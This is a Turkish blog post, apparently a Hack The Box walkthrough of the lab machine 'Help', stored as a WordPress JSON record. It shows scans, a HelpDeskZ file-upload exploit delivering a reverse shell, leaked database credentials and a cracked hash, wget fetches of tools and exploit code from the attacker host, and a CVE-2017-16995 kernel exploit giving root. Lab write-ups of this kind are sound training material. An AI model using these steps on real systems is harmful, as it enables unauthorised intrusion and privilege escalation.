{"id":1554,"date":"2021-09-12T19:09:10","date_gmt":"2021-09-12T19:09:10","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1554"},"modified":"2021-09-12T19:09:10","modified_gmt":"2021-09-12T19:09:10","slug":"help","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/12\/help\/","title":{"rendered":"Help"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/170\" title=\"Help\">Help<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/2f6225d90a3caf56699c3d93e8779d6b.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131:<\/p>\n<pre><code class=\"language-sh\">PORT     STATE SERVICE VERSION\n22\/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)\n|   256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)\n|_  256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)\n80\/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Apache2 Ubuntu Default Page: It works\n3000\/tcp open  http    Node.js Express framework\n|_http-title: Site doesn&#039;t have a title (application\/json; charset=utf-8).\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>3000'de hi\u00e7 bir \u015fey bulamad\u0131m. Bunun \u00fczerine 80'e odakland\u0131m. gobuster taramas\u0131 att\u0131\u011f\u0131mda a\u015fa\u011f\u0131daki sonu\u00e7lar\u0131 ald\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/Help]\n\u2514\u2500# gobuster dir --add-slash --expanded --follow-redirect --url http:\/\/10.10.10.121\/ --no-error -t 50 --extensions php,txt,html --wordlist \/usr\/share\/wordlists\/dirb\/big.txt| tee gobuster3\n===============================================================\nGobuster v3.1.0\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.10.10.121\/\n[+] Method:                  GET\n[+] Threads:                 50\n[+] Wordlist:                \/usr\/share\/wordlists\/dirb\/big.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.1.0\n[+] Extensions:              php,txt,html\n[+] Add Slash:               true\n[+] Follow Redirect:         true\n[+] Expanded:                true\n[+] Timeout:                 10s\n===============================================================\n2021\/09\/12 09:04:47 Starting gobuster in directory enumeration mode\n===============================================================\nhttp:\/\/10.10.10.121\/.htpasswd\/           (Status: 403) [Size: 297]\nhttp:\/\/10.10.10.121\/.htpasswd.php        (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.121\/.htpasswd.txt        (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.121\/.htpasswd.html       (Status: 403) [Size: 301]\nhttp:\/\/10.10.10.121\/.htaccess\/           (Status: 403) [Size: 297]\nhttp:\/\/10.10.10.121\/.htaccess.php        (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.121\/.htaccess.txt        (Status: 403) [Size: 300]\nhttp:\/\/10.10.10.121\/.htaccess.html       (Status: 403) [Size: 301]\nhttp:\/\/10.10.10.121\/icons\/               (Status: 403) [Size: 293]\nhttp:\/\/10.10.10.121\/index.html           (Status: 200) [Size: 11321]\nhttp:\/\/10.10.10.121\/javascript\/          (Status: 403) [Size: 298]  \nhttp:\/\/10.10.10.121\/server-status\/       (Status: 403) [Size: 301]  \nhttp:\/\/10.10.10.121\/support\/             (Status: 200) [Size: 4453] \n<\/code><\/pre>\n<p><a href=\"http:\/\/10.10.10.121\/support\/\">http:\/\/10.10.10.121\/support\/<\/a> adresinde <code>HelpDeskZ<\/code> isimli bir uygulama ko\u015fuyor. Default credential yok ancak verion numaras\u0131na g\u00f6re yay\u0131nlanm\u0131\u015f baz\u0131 exploitler var.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/Desktop\/HTB\/Linux\/Help]\n\u2514\u2500# searchsploit HelpDeskZ                        \n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\n Exploit Title                                                                                                                                                                                              |  Path\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nHelpDeskZ 1.0.2 - Arbitrary File Upload                                                                                                                                                                     | php\/webapps\/40300.py\nHelpDeskZ &lt; 1.0.2 - (Authenticated) SQL Injection \/ Unauthorized File Download                                                                                                                              | php\/webapps\/41200.py\n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------\nShellcodes: No Results\nPapers: No Results\n<\/code><\/pre>\n<p>\u0130kinci bir gobuster taramamda <a href=\"http:\/\/10.10.10.121\/support\/readme.htm\">http:\/\/10.10.10.121\/support\/readme.htm<\/a> adresini buldum ve burada version numaras\u0131n\u0131n 1.0.2 oldu\u011fu yaz\u0131l\u0131yd\u0131 yani exploitleri kullanabiliriz ancak bir t\u00fcrl\u00fc unauthentated exploit olan dosya y\u00fcklemeyi kullanamad\u0131m. Bunun \u00fczerine internette ara\u015ft\u0131rmaya ba\u015flad\u0131m.  <\/p>\n<pre><code>https:\/\/gist.githubusercontent.com\/dasithsv\/d2b0c8cea39096e19f336f5e29bbf803\/raw\/a6d24e637a9fb3dfb7c6d1598980af2594f6a168\/HelpDeskZ 1.0.2 - Arbitrary File Upload.py<\/code><\/pre>\n<p>adresinde exploiti okudu\u011fumda asl\u0131nda mevcut exploiti yanl\u0131\u015f kulland\u0131\u011f\u0131m\u0131 g\u00f6rd\u00fcm. Sisteme ilk \u00f6nce bir dosya y\u00fcklemem gerekmekte <a href=\"http:\/\/10.10.10.121\/support\/?v=submit_ticket&amp;action=confirmation\">http:\/\/10.10.10.121\/support\/?v=submit_ticket&action=confirmation<\/a> adresinden reverse shell'imi y\u00fckledim daha sonra exploiti \u00e7al\u0131\u015ft\u0131rd\u0131m.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/HTB\/Linux\/Help\/exploit]\n\u2514\u2500# python 40300.py http:\/\/10.10.10.121\/support\/uploads\/tickets\/ test.php                                      130 \u2a2f\nHelpdeskz v1.0.2 - Unauthenticated shell upload exploit\n1631455471\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/\u2026\/HTB\/Linux\/Help\/exploit]\n\u2514\u2500# nc -lvp 1234                                                                                                 1 \u2a2f\nlistening on [any] 1234 ...\n10.10.10.121: inverse host lookup failed: Unknown host\nconnect to [10.10.14.18] from (UNKNOWN) [10.10.10.121] 38868\nLinux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU\/Linux\n 07:04:34 up 56 min,  0 users,  load average: 1.15, 1.27, 1.05\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n$ <\/code><\/pre>\n<p>Ve reverse ald\u0131m. \u0130lk flagi okuyal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nhelp@help:\/home$ cd help\ncd help\nhelp@help:\/home\/help$ ls\nls\ntotal 76\ndrwxr-xr-x   7 help help  4096 Jan 11  2019 .\ndrwxr-xr-x   3 root root  4096 Nov 27  2018 ..\n-rw-rw-r--   1 help help   272 Jan 11  2019 .bash_history\n-rw-r--r--   1 help help   220 Nov 27  2018 .bash_logout\n-rw-r--r--   1 root root     1 Nov 27  2018 .bash_profile\n-rw-r--r--   1 help help  3771 Nov 27  2018 .bashrc\ndrwx------   2 help help  4096 Nov 27  2018 .cache\ndrwxr-xr-x   4 help help  4096 Sep 12 06:08 .forever\n-rw-------   1 help help   442 Nov 28  2018 .mysql_history\ndrwxrwxr-x   2 help help  4096 Nov 27  2018 .nano\ndrwxrwxr-x 290 help help 12288 Jan 11  2019 .npm\n-rw-r--r--   1 help help   655 Nov 27  2018 .profile\n-rw-rw-r--   1 help help    66 Nov 28  2018 .selected_editor\n-rw-r--r--   1 help help     0 Nov 27  2018 .sudo_as_admin_successful\n-rw-rw-r--   1 help help   225 Dec 11  2018 .wget-hsts\ndrwxrwxrwx   6 root root  4096 Jan 11  2019 help\n-rw-rw-r--   1 help help   946 Nov 28  2018 npm-debug.log\n-rw-r--r--   1 root root    33 Nov 28  2018 user.txt\nhelp@help:\/home\/help$ cat user.txt\ncat user.txt\nbb8a7b36bdce0c61ccebaa173ef946af\n<\/code><\/pre>\n<p>Daha sonras\u0131nda makine i\u00e7erisinde inceleme yapt\u0131m. \u0130\u015fte ilgin\u00e7 buldu\u011fum sonu\u00e7lar.<\/p>\n<pre><code>help        685  0.0  0.2 947668  2992 ?        Ssl  06:08   0:00 \/usr\/bin\/nodejs \/usr\/local\/lib\/node_modules\/forever\/bin\/monitor \/home\/help\/help\/dist\/bundle.js\nhelp        695  0.7  3.7 990444 36928 ?        Sl   06:08   0:27  _ \/usr\/bin\/nodejs \/home\/help\/help\/dist\/bundle.js\n<\/code><\/pre>\n<pre><code>\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Cron jobs\n\u255a https:\/\/book.hacktricks.xyz\/linux-unix\/privilege-escalation#scheduled-cron-jobs\n\/usr\/bin\/crontab\n# Edit this file to introduce tasks to be run by cron.\n# \n# Each task to run has to be defined through a single line\n# indicating with different fields when the task will be run\n# and what command to run for the task\n# \n# To define the time you can provide concrete values for\n# minute (m), hour (h), day of month (dom), month (mon),\n# and day of week (dow) or use &#039;*&#039; in these fields (for &#039;any&#039;).# \n# Notice that tasks will be started based on the cron&#039;s system\n# daemon&#039;s notion of time and timezones.\n# \n# Output of the crontab jobs (including errors) is sent through\n# email to the user the crontab file belongs to (unless redirected).\n# \n# For example, you can run a backup of all your user accounts\n# at 5 a.m every week with:\n# 0 5 * * 1 tar -zcf \/var\/backups\/home.tgz \/home\/\n# \n:<\/code><\/pre>\n<pre><code>help@help:\/var\/www\/html\/support$ find \/var\/www\/html\/support -name &quot;*config*&quot; 2&gt;\/dev\/null\n&lt;port$ find \/var\/www\/html\/support -name &quot;*config*&quot; 2&gt;\/dev\/null               \n\/var\/www\/html\/support\/includes\/config.php\nhelp@help:\/var\/www\/html\/support$ cat \/var\/www\/html\/support\/includes\/config.php\n&lt;port$ cat \/var\/www\/html\/support\/includes\/config.php                         \n&lt;?php\n    $config[&#039;Database&#039;][&#039;dbname&#039;] = &#039;support&#039;;\n    $config[&#039;Database&#039;][&#039;tableprefix&#039;] = &#039;&#039;;\n    $config[&#039;Database&#039;][&#039;servername&#039;] = &#039;localhost&#039;;\n    $config[&#039;Database&#039;][&#039;username&#039;] = &#039;root&#039;;\n    $config[&#039;Database&#039;][&#039;password&#039;] = &#039;helpme&#039;;\n    $config[&#039;Database&#039;][&#039;type&#039;] = &#039;mysqli&#039;;\n    ?&gt;help@help:\/var\/www\/html\/support$ <\/code><\/pre>\n<pre><code>mysql&gt; select * from users;\nselect * from users;\n+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+\n| id | salutation | fullname | email                 | password                                 | timezone         | status |\n+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+\n|  1 |          0 | helpme   | helpme@helpme.com     | c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca | Indian\/Christmas |      1 |\n|  2 |          0 | xcvxv    | lolololol@yopmail.com | ec09fa0d0ba74336ea7fe392869adb198242f15a | NULL             |      1 |\n+----+------------+----------+-----------------------+------------------------------------------+------------------+--------+<\/code><\/pre>\n<pre><code>c3b3bd1eb5142e29adb0044b16ee4d402d06f9ca:sha1:godhelpmeplz<\/code><\/pre>\n<pre><code>[*] fst130 Does &#039;help&#039; have mail?.......................................... yes!\n---ore--(4%)\n--More--(4%) \n-rw-rw---- 1 help mail 27501 Sep 12 08:35 \/var\/mail\/help<\/code><\/pre>\n<pre><code>var _user = { username: &#039;helpme@helpme.com&#039;, password: &#039;5d3c93182bb20f07b994a7f617e99cff&#039; };<\/code><\/pre>\n<p>Bunlar\u0131n hi\u00e7biri i\u015fe yaramad\u0131 bende exploit suggester \u00e7al\u0131\u015ft\u0131rd\u0131m.<\/p>\n<pre><code class=\"language-sh\">help@help:\/tmp$ wget http:\/\/10.10.14.18\/linux-exploit-suggester.sh\nwget http:\/\/10.10.14.18\/linux-exploit-suggester.sh\n--2021-09-12 10:12:06--  http:\/\/10.10.14.18\/linux-exploit-suggester.sh\nConnecting to 10.10.14.18:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 88891 (87K) [text\/x-sh]\nSaving to: &#039;linux-exploit-suggester.sh&#039;\n\nlinux-exploit-sugge 100%[===================&gt;]  86.81K   466KB\/s    in 0.2s    \n\n2021-09-12 10:12:06 (466 KB\/s) - &#039;linux-exploit-suggester.sh&#039; saved [88891\/88891]\n\nhelp@help:\/tmp$ chmod +x linux-exploit-suggester.sh\nchmod +x linux-exploit-suggester.sh\nhelp@help:\/tmp$ \n\nhelp@help:\/tmp$ \n\nhelp@help:\/tmp$ \n\nhelp@help:\/tmp$ .\/linux-exploit-suggester.sh\n.\/linux-exploit-suggester.sh\n\nAvailable information:\n\nKernel version: 4.4.0\nArchitecture: x86_64\nDistribution: ubuntu\nDistribution version: 16.04\nAdditional checks (CONFIG_*, sysctl entries, custom Bash commands): performed\nPackage listing: from current OS\n\nSearching among:\n\n78 kernel space exploits\n48 user space exploits\n\nPossible Exploits:\n\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\ncat: write error: Broken pipe\n[+] [CVE-2017-16995] eBPF_verifier\n\n   Details: https:\/\/ricklarabee.blogspot.com\/2018\/07\/ebpf-and-analysis-of-get-rekt-linux.html\n   Exposure: highly probable\n   Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}\n   Download URL: https:\/\/www.exploit-db.com\/download\/45010\n   Comments: CONFIG_BPF_SYSCALL needs to be set &amp;&amp; kernel.unprivileged_bpf_disabled != 1\n\n[+] [CVE-2016-5195] dirtycow\n\n   Details: https:\/\/github.com\/dirtycow\/dirtycow.github.io\/wiki\/VulnerabilityDetails\n   Exposure: highly probable\n   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]\n   Download URL: https:\/\/www.exploit-db.com\/download\/40611\n   Comments: For RHEL\/CentOS see exact vulnerable versions here: https:\/\/access.redhat.com\/sites\/default\/files\/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2016-5195] dirtycow 2\n\n   Details: https:\/\/github.com\/dirtycow\/dirtycow.github.io\/wiki\/VulnerabilityDetails\n   Exposure: highly probable\n   Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},[ ubuntu=16.04 ]{kernel:4.4.0-21-generic}\n   Download URL: https:\/\/www.exploit-db.com\/download\/40839\n   ext-url: https:\/\/www.exploit-db.com\/download\/40847\n   Comments: For RHEL\/CentOS see exact vulnerable versions here: https:\/\/access.redhat.com\/sites\/default\/files\/rh-cve-2016-5195_5.sh\n\n[+] [CVE-2021-3156] sudo Baron Samedit 2\n\n   Details: https:\/\/www.qualys.com\/2021\/01\/26\/cve-2021-3156\/baron-samedit-heap-based-overflow-sudo.txt\n   Exposure: probable\n   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10\n   Download URL: https:\/\/codeload.github.com\/worawit\/CVE-2021-3156\/zip\/main\n\n[+] [CVE-2017-7308] af_packet\n\n   Details: https:\/\/googleprojectzero.blogspot.com\/2017\/05\/exploiting-linux-kernel-via-packet.html\n   Exposure: probable\n   Tags: [ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}\n   Download URL: https:\/\/raw.githubusercontent.com\/xairy\/kernel-exploits\/master\/CVE-2017-7308\/poc.c\n   ext-url: https:\/\/raw.githubusercontent.com\/bcoles\/kernel-exploits\/master\/CVE-2017-7308\/poc.c\n   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at &#039;ext-url&#039; adds support for additional kernels\n\n[+] [CVE-2017-6074] dccp\n\n   Details: http:\/\/www.openwall.com\/lists\/oss-security\/2017\/02\/22\/3\n   Exposure: probable\n   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-62-generic}\n   Download URL: https:\/\/www.exploit-db.com\/download\/41458\n   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP\/SMAP bypass\n\n[+] [CVE-2017-5899] s-nail-privget\n\n   Details: https:\/\/www.openwall.com\/lists\/oss-security\/2017\/01\/27\/7\n   Exposure: probable\n   Tags: [ ubuntu=16.04 ],manjaro=16.10\n   Download URL: https:\/\/www.openwall.com\/lists\/oss-security\/2017\/01\/27\/7\/1\n   ext-url: https:\/\/raw.githubusercontent.com\/bcoles\/local-exploits\/master\/CVE-2017-5899\/exploit.sh\n   Comments: Distros use own versioning scheme. Manual verification needed.\n\n[+] [CVE-2017-1000112] NETIF_F_UFO\n\n   Details: http:\/\/www.openwall.com\/lists\/oss-security\/2017\/08\/13\/1\n   Exposure: probable\n   Tags: ubuntu=14.04{kernel:4.4.0-*},[ ubuntu=16.04 ]{kernel:4.8.0-*}\n   Download URL: https:\/\/raw.githubusercontent.com\/xairy\/kernel-exploits\/master\/CVE-2017-1000112\/poc.c\n   ext-url: https:\/\/raw.githubusercontent.com\/bcoles\/kernel-exploits\/master\/CVE-2017-1000112\/poc.c\n   Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP\/KASLR bypass included. Modified version at &#039;ext-url&#039; adds support for additional distros\/kernels\n\n[+] [CVE-2016-8655] chocobo_root\n\n   Details: http:\/\/www.openwall.com\/lists\/oss-security\/2016\/12\/06\/1\n   Exposure: probable\n   Tags: [ ubuntu=(14.04|16.04) ]{kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}\n   Download URL: https:\/\/www.exploit-db.com\/download\/40871\n   Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled\n\n[+] [CVE-2016-4557] double-fdput()\n\n   Details: https:\/\/bugs.chromium.org\/p\/project-zero\/issues\/detail?id=808\n   Exposure: probable\n   Tags: [ ubuntu=16.04 ]{kernel:4.4.0-21-generic}\n   Download URL: https:\/\/github.com\/offensive-security\/exploit-database-bin-sploits\/raw\/master\/bin-sploits\/39772.zip\n   Comments: CONFIG_BPF_SYSCALL needs to be set &amp;&amp; kernel.unprivileged_bpf_disabled != 1<\/code><\/pre>\n<pre><code class=\"language-sh\">help@help:\/tmp$ wget http:\/\/10.10.14.18\/cve-2017-16995.c\nwget http:\/\/10.10.14.18\/cve-2017-16995.c\n--2021-09-12 10:57:57--  http:\/\/10.10.14.18\/cve-2017-16995.c\nConnecting to 10.10.14.18:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 13728 (13K) [text\/x-csrc]\nSaving to: &#039;cve-2017-16995.c&#039;\n\ncve-2017-16995.c    100%[===================&gt;]  13.41K  --.-KB\/s    in 0.09s   \n\n2021-09-12 10:57:57 (157 KB\/s) - &#039;cve-2017-16995.c&#039; saved [13728\/13728]\n\nhelp@help:\/tmp$ gcc cve-2017-16995.c -o cve-2017-16995\ngcc cve-2017-16995.c -o cve-2017-16995\nhelp@help:\/tmp$ ls\nls\ntotal 1040\ndrwxrwxrwt 10 root root   4096 Sep 12 10:58 .\ndrwxr-xr-x 22 root root   4096 Nov 28  2018 ..\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .ICE-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .Test-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .X11-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .XIM-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 .font-unix\ndrwxrwxrwt  2 root root   4096 Sep 12 06:08 VMwareDnD\n-rwxrwxrwx  1 help help  18440 Sep 12 10:58 cve-2017-16995\n-rw-rw-rw-  1 help help  13728 Sep 12 10:52 cve-2017-16995.c\n-rwxrwxrwx  1 help help 452509 Aug 26 13:47 linpeas.sh\n-rwxrwxrwx  1 help help  88891 Sep  8 14:58 linux-exploit-suggester.sh\n-rwxrwxrwx  1 help help  41177 Sep  8 14:34 lse.sh\n-rw-rw-rw-  1 help help 200427 Sep 12 07:12 result1\n-rw-rw-rw-  1 help help 193317 Sep 12 08:36 result2\ndrwx------  3 root root   4096 Sep 12 06:08 systemd-private-f9459c97985149de9df4c8fd9c15df9e-systemd-timesyncd.service-Ka57wQ\ndrwx------  2 root root   4096 Sep 12 06:08 vmware-root\nhelp@help:\/tmp$ .\/cve-2017-16995\n.\/cve-2017-16995\n[.] \n[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)\n[.] \n[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **\n[.] \n[*] creating bpf map\n[*] sneaking evil bpf past the verifier\n[*] creating socketpair()\n[*] attaching bpf backdoor to socket\n[*] skbuff =&gt; ffff88003af7ba00\n[*] Leaking sock struct from ffff88001f403c00\n[*] Sock-&gt;sk_rcvtimeo at offset 472\n[*] Cred structure at ffff88003912bbc0\n[*] UID from cred structure: 1000, matches the current: 1000\n[*] hammering cred structure at ffff88003912bbc0\n[*] credentials patched, launching shell...\n# id\nid\nuid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)\n# cd \/root\ncd \/root\n# ls\nls\nroot.txt\n# cat root.txt\ncat root.txt\nb7fe6082dcdf0c1b1e02ab0d9daddb98\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Help &#8211; HTB Kolay Linux Walkthrough nmap taramas\u0131: PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/09\/12\/help\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Help<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[],"class_list":["post-1554","post","type-post","status-publish","format-standard","hentry","category-walkthrough","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1554","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1554"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1554\/revisions"}],"predecessor-version":[{"id":1555,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1554\/revisions\/1555"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1554"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1554"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1554"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}